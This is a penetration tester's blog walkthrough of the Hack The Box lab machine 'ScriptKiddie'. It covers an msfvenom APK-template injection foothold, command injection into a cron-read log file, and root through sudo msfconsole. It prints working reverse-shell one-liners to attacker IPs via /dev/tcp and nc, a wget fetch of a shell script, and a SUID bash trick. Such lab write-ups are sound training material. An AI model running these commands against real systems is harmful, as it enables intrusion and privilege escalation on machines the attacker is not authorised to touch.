This page looks best with JavaScript enabled

ScriptKiddie

 ·  ☕ 5 min read  ·  ✍️ T4r0

https://www.hackthebox.eu/home/machines/profile/314

Summary

This box had a CVE for foothold which exploited msfvenom apk generation. Once we are able to get a shell, we already have user. We have to do horizontal privesc into antoher user by command injection, then basic enumeration to get root.

Exploring the target

First things first, after deploying the box and getting an IP, I started with an nmap scan. In fact, I usually run 2 nmap scans, one to quickly grab the open ports, then one to enumerate the running services in more details, so I’ve ran the following two commands:

1

nmap -sS -T4 -Pn <IP>

To grab the open ports, then:

1

nmap -sC -sV -Pn -T4 -p <PORTS I GOT FROM PREV SCAN> <IP>

To enumerate service headers and versions.

This gave us the following result:
Nmap result

Foothold

Port 22 didn’t seem interesting, so I moved on to port 5000. This is a python webserver, which isn’t vulnerable, but the application hosted on it is. Looks like we are greeted by a page containing some 1337 h4x0r tools. After poking around for basic command injection and a bit of googling, I came across this exploit. The main “hint” which gave this away was that I could generate apk payloads, which is kinda unusual so I looked into it and suprise suprise it was the right path. This exploit works by injecting arbitary system code into the apk generation of msfvenom, so we have code execution!

I’ll say it now, straight up reverse shell didn’t work for me, rather I had to save the bash reverse shell code to a file, then upload it to the target and run it that way.

We need to modify the payload in line 15.

User

First I made a rev.sh file with the content:

1
2

#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'

Next we modify the exploit code to wget this revshell from our attack box:

1

wget IP/rev.sh -O /tmp/rev.sh

Let’s start a python http server:

1

python3 -m http.server 80

Now we have to run the exploit with python3, which will generate a malicious msfvenom template for us, which we can import on the website during payload generation and the command we gave on line 15 will run hopefully (we can confirm this by looking at the python http server logs).
If successful, the exploit script will generate a malicious apk in the /tmp folder, which we can use.

After this is done, let’s import the apk on the website.

Once we click generate, we can see the GET request to our python server.

Okay, we have our reverse shell code in the /tmp folder. Next step is to generate another apk with our exploit, which will run the reverse shell which we saved on the target.
Let’s put the command into the exploit generator first:

1

bash /tmp/rev.sh

And let’s not forget to open a listener for the shell which will connect back to us:

1

rlwrap nc -lvnp 1337

We generate another evil.apk with our exploit python script, import it on the website and send the request. Shortly after this, we get back a shell as kid.

Let’s stabilize our shell a bit:

1
2

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

If we go to our home directory, we can find user.txt there.

Root

After checking out the folders on the target we can see another user’s home directory, called pwn. We have read privs for some of the files in this directory. We can see, that there’s a file called scanlosers.sh in this directory, which we can read. This file uses another file as input found at /home/kid/logs/hackers. We can modify this, so there is confirmed command injection and we should be able to get a shell as pwn. I already suspected that this shell script runs automatically from time to time, but to confirm this, I’ve moved pspy onto the target and ran it to monitor results. This indeed confirmed my theory.

Have to take note that the box has some weird anomalies. The method I used for command injection when the box came out didn’t work when I did my wirteup and retried the box. The 2nd method also didn’t work when my friend did the box the 3rd time, so I found another working method. All three methods are listed below.

The first time, I used:

1

echo '/bin/sh -i |rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f' >> hackers

The one I used the second time I did the box:

1

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #" >> hackers

Initially these methods gave me a reverse shell immediately as pwn, but staff or the box creator probably modified the box several times, or atleast stuff that used to work fine didn’t work anymore. My third method was to copy bash and make it a SUID:

1
2
3

echo '/bin/sh -i |cp /bin/bash ~/; chmod +s ~/bash' >> heackers
ls -la /home/pwn
/home/pwn/bash -p

Then do:

1
2
3
4
5
6
7

cd /home/pwn
echo '#!/bin/bash' > run.sh
echo ' ' > run.sh
echo 'bash -i >& /dev/tcp/10.10.14.203/4545 0>&1' > run.sh
chmod +x run.sh
cd /home/kid/logs
echo '/bin/sh -i |bash /home/pwn/run.sh' > hackers

Had to do this, because being in a SUID bash in another user doesn’t allow us to run sudo. So had to go through the long steps of getting an actual shell back as the given user.

I’ve ran sudo -l to see that we can run msfconsole as root. Well you can execute OS commands inside msfconsole, so let’s start it and we can get a root shell.

1

sudo /opt/metasploit-framework-6.0.9/msfconsole

Then run

1

/bin/bash

We are root!

Share on
Support the author with
T4r0
WRITTEN BY
T4r0
Penetration Tester

See Also